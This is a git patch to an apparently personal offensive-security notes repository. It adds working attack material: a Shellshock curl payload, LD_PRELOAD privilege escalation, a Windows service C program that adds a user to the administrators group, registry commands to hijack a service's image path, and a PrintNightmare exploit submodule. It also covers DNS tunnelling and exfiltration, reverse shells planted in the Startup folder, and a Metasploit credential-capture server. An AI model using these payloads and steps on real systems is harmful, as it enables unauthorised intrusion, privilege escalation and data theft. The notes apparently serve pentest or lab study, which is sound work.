From 6b8f9472c7637ce9e69497bc1ea68a1abd07cf96 Mon Sep 17 00:00:00 2001 From: whx Date: Sun, 31 Oct 2021 02:43:24 +0200 Subject: [PATCH] bump --- .gitmodules | 3 + exfiltration/dns/dns.md | 49 ++++++++++++ exploit/binaries/r2.md | 48 ++++++++++++ exploit/linux/ld_preload.md | 37 ++++++++- exploit/linux/shell_shock.md | 6 ++ exploit/windows/CVE-2021-1675 | 1 + exploit/windows/service_escalation/service.c | 76 +++++++++++++++++++ .../service_escalation/service_escalation.md | 19 +++++ misc/hashcat_utils.md | 6 ++ osint/spiderfoot.md | 8 ++ .../priv_esc/docs/windows/windows_priv_esc.md | 24 ++++++ stego/docs/outguess.md | 2 + 12 files changed, 278 insertions(+), 1 deletion(-) create mode 100644 exfiltration/dns/dns.md create mode 100644 exploit/linux/shell_shock.md create mode 160000 exploit/windows/CVE-2021-1675 create mode 100644 exploit/windows/service_escalation/service.c create mode 100644 exploit/windows/service_escalation/service_escalation.md create mode 100644 misc/hashcat_utils.md create mode 100644 osint/spiderfoot.md create mode 100644 stego/docs/outguess.md diff --git a/.gitmodules b/.gitmodules index c7aa350..117f855 100644 --- a/.gitmodules +++ b/.gitmodules @@ -49,3 +49,6 @@ [submodule "post_exploitation/priv_esc/privesc-scripts/linuxprivchecker"] path = post_exploitation/priv_esc/privesc-scripts/linuxprivchecker url = https://github.com/linted/linuxprivchecker +[submodule "exploit/windows/CVE-2021-1675"] + path = exploit/windows/CVE-2021-1675 + url = https://github.com/calebstewart/CVE-2021-1675 diff --git a/exfiltration/dns/dns.md b/exfiltration/dns/dns.md new file mode 100644 index 0000000..d5436f6 --- /dev/null +++ b/exfiltration/dns/dns.md @@ -0,0 +1,49 @@ +# DNS + +* [Root Servers](https://www.iana.org/domains/root/servers) +* [Zones](https://www.cloudflare.com/learning/dns/glossary/dns-zone/) +* [Records](https://www.cloudflare.com/learning/dns/dns-records/) + +## Tunneling +* [Tunnel IPv4 Data through DNS](https://github.com/yarrick/iodine.git) +* Start server on an outside DNS server. This may be a evs. +```sh +iodined -b 47110-f 10.0.0.1 tunnel.test.com +``` +* Use client via +```sh +iodine -f -r tunnel.test.com +``` +* `NS` record of the owned domain should contain the subdomain, e.g. `tunnel.test.com` +* Client gets a tunnel IP in the range of `10.0.0.0/8` +* Check connection via +```sh +ping +``` +* Generate ssh-key and put in on the server +* Dynamic port forwarding to server via +```sh +ssh @10.0.0.1 -D 8080 +``` +* User proxy server on the client's web server like `--proxy-server` or use a SOCKS proxy like FoxyProxy + +## nslookup +```sh +nslookup type=txt +``` + +## Reverse lookup +* Stored inside `PTR` record +* Reverse IP may look like `.in-addr.arpa.`, but not via `drill` or `dig` +```sh +drill -x +short +``` + +## Exfiltration +* Add data to UDP DNS requests +* Capture traffic on an owned DNS server +* `253` is the max length of a DNS name +* Encode the payload to hide it + +## Infiltration +* Inside `TXT` or any other possible records diff --git a/exploit/binaries/r2.md b/exploit/binaries/r2.md index db8f289..54bcba1 100644 --- a/exploit/binaries/r2.md +++ b/exploit/binaries/r2.md @@ -9,14 +9,47 @@ r2 -d ```sh aaa ``` +* Show all info +```sh +ia +``` +* Search for strings +```sh +izz +``` +* Main address +```sh +iM +``` +* Entrypoint +```sh +ie +``` +* Current memory address +```sh +s +``` +* Show address of function or register, respectively +```sh +s +sr +``` * Show main ```sh pdf @main ``` +* Show main and follwing functions +```sh +pd @main +``` * Breakpoint ```sh db 0xdeadbeef ``` +* Show all breakpoints +```sh +dbi +``` * Show rbp-0x4 ```sh px @rbp-0x4 @@ -37,6 +70,21 @@ dr ```sh ood ``` +### Visual Mode +* Enter visual mode via `VV` +* Enter normal mode inside visual mode via `:` +* Add comment via `;` + +### Write Mode +* Enter write mode via `w` +* Write cache list via `wc` +* Alter/modify opcode at current seek via `wA` +* Use as follows +```sh +s +wx +dc +``` ## AT&T Instructions * leaq src, dst: this instruction sets dst to the address denoted by the expression in src diff --git a/exploit/linux/ld_preload.md b/exploit/linux/ld_preload.md index 394b45e..4e99b97 100644 --- a/exploit/linux/ld_preload.md +++ b/exploit/linux/ld_preload.md @@ -2,7 +2,11 @@ * Preload libs and do interpositioning of functions. -## Example +* `man ld.so` +* `man dlsym`, `dlsym()` calls the original function + +## Example 1 +* Interpositioning of `_init()` ```sh #include #include @@ -19,3 +23,34 @@ void _init() { * `sudo LD_PRELOAD=lib.so apache2` * `$ id` + +## Example 2 +* Interpositioning of `write()` +```C +#include +#include +#include // Contains _GNU_SOURCE from man dlsym +#include +ssize_t write(int fildes, const void *buf, size_t nbytes) +{ + ssize_t result; + do the thing; + return result; +} +``` +* In case the symbol lookup returns an error libdl is linked +```sh +gcc -ldl interpositioning.c -fPIC -shared -D _GNU_SOURCE -o interpositioning.so -ldl` +``` +## Preloading +* Dependent on the installation status of lib32 and/or lib64 and various packages the path of `LD_PRELOAD` has to be set differently. These may look as follows +* `LD_PRELOAD=./interpositioning.so ` +or +* `export LD_PRELOAD=$(pwd)/interpositioning.so` +or +* Global preload via `/etc/ld.so.preload` +or +* Change the preload path via `LD_PRELOAD_PATH` + +* Verify via `ldd ` + diff --git a/exploit/linux/shell_shock.md b/exploit/linux/shell_shock.md new file mode 100644 index 0000000..dfc0209 --- /dev/null +++ b/exploit/linux/shell_shock.md @@ -0,0 +1,6 @@ +# Shell Shock + +* Check target via +```sh +curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" http:///cgi-bin/test/test.cgi +``` diff --git a/exploit/windows/CVE-2021-1675 b/exploit/windows/CVE-2021-1675 new file mode 160000 index 0000000..ed724e5 --- /dev/null +++ b/exploit/windows/CVE-2021-1675 @@ -0,0 +1 @@ +Subproject commit ed724e576adb377b9c5b91f4343012108307fff9 diff --git a/exploit/windows/service_escalation/service.c b/exploit/windows/service_escalation/service.c new file mode 100644 index 0000000..9e23ce6 --- /dev/null +++ b/exploit/windows/service_escalation/service.c @@ -0,0 +1,76 @@ +#include +#include + +#define SLEEP_TIME 5000 + +SERVICE_STATUS ServiceStatus; +SERVICE_STATUS_HANDLE hStatus; + +void ServiceMain(int argc, char** argv); +void ControlHandler(DWORD request); + +//add the payload here +int Run() +{ + system("cmd.exe /k net localgroup administrators user /add"); + return 0; +} + +int main() +{ + SERVICE_TABLE_ENTRY ServiceTable[2]; + ServiceTable[0].lpServiceName = "MyService"; + ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain; + + ServiceTable[1].lpServiceName = NULL; + ServiceTable[1].lpServiceProc = NULL; + + StartServiceCtrlDispatcher(ServiceTable); + return 0; +} + +void ServiceMain(int argc, char** argv) +{ + ServiceStatus.dwServiceType = SERVICE_WIN32; + ServiceStatus.dwCurrentState = SERVICE_START_PENDING; + ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN; + ServiceStatus.dwWin32ExitCode = 0; + ServiceStatus.dwServiceSpecificExitCode = 0; + ServiceStatus.dwCheckPoint = 0; + ServiceStatus.dwWaitHint = 0; + + hStatus = RegisterServiceCtrlHandler("MyService", (LPHANDLER_FUNCTION)ControlHandler); + Run(); + + ServiceStatus.dwCurrentState = SERVICE_RUNNING; + SetServiceStatus (hStatus, &ServiceStatus); + + while (ServiceStatus.dwCurrentState == SERVICE_RUNNING) + { + Sleep(SLEEP_TIME); + } + return; +} + +void ControlHandler(DWORD request) +{ + switch(request) + { + case SERVICE_CONTROL_STOP: + ServiceStatus.dwWin32ExitCode = 0; + ServiceStatus.dwCurrentState = SERVICE_STOPPED; + SetServiceStatus (hStatus, &ServiceStatus); + return; + + case SERVICE_CONTROL_SHUTDOWN: + ServiceStatus.dwWin32ExitCode = 0; + ServiceStatus.dwCurrentState = SERVICE_STOPPED; + SetServiceStatus (hStatus, &ServiceStatus); + return; + + default: + break; + } + SetServiceStatus (hStatus, &ServiceStatus); + return; +} diff --git a/exploit/windows/service_escalation/service_escalation.md b/exploit/windows/service_escalation/service_escalation.md new file mode 100644 index 0000000..8c1e996 --- /dev/null +++ b/exploit/windows/service_escalation/service_escalation.md @@ -0,0 +1,19 @@ +# Service Escalation + +* Check service control permission +```sh +Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl +``` +* Add command to system() function inside `service.c`, e.g. add user to administrators group +```sh +cmd.exe /k net localgroup administrators user /add +``` +* Compile via +```sh +x86_64-w64-mingw32-gcc service.c service.exe +``` +* Upload to target and +```sh +reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\Temp\service.exe /f +sc start regsvc +``` diff --git a/misc/hashcat_utils.md b/misc/hashcat_utils.md new file mode 100644 index 0000000..96f02cc --- /dev/null +++ b/misc/hashcat_utils.md @@ -0,0 +1,6 @@ +# Hashcat Utilities + +* Combine wordlists +```sh +combinator wordlist.txt otherwordlist.txt > newwordlist.txt +``` diff --git a/osint/spiderfoot.md b/osint/spiderfoot.md new file mode 100644 index 0000000..c94964d --- /dev/null +++ b/osint/spiderfoot.md @@ -0,0 +1,8 @@ +# Spiderfoot + +* OSINT online spider +* [Repo & releases](https://github.com/smicallef/spiderfoot.git) +* Start server locally via +```sh +python sf.py -l 127.0.0.1:5000 +``` diff --git a/post_exploitation/priv_esc/docs/windows/windows_priv_esc.md b/post_exploitation/priv_esc/docs/windows/windows_priv_esc.md index 3804879..3ebdf78 100644 --- a/post_exploitation/priv_esc/docs/windows/windows_priv_esc.md +++ b/post_exploitation/priv_esc/docs/windows/windows_priv_esc.md @@ -75,3 +75,27 @@ runas /savecred /user: reverse_shell.exe reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s ``` + +### accesschk64 Permissions +* Check access to files and folders +```sh +accesschk64 -wvu "file.exe" +``` +* If permission `SERVICE_CHANGE_CONFIG` is set +```sh + sc config binpath="net localgroup administrators user /add" +``` +* [Service escalation](../../../../exploit/windows/service_escalation/service_escalation.md) +* Any other binary works as well. Copy the compiled portable executable from the `service_escalation` onto the binary path.Restart the service afterwards. + +### Startup Application +* Put reverse shell instead of an executable inside `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup` + +### Password Mining +* Set up metasploit +```sh +use auxiliary/server/capture/http_basic +set srvport 7777 +set uripath pass +``` +* Visit site on target diff --git a/stego/docs/outguess.md b/stego/docs/outguess.md new file mode 100644 index 0000000..c056ec3 --- /dev/null +++ b/stego/docs/outguess.md @@ -0,0 +1,2 @@ +# Outguess +`man outguess`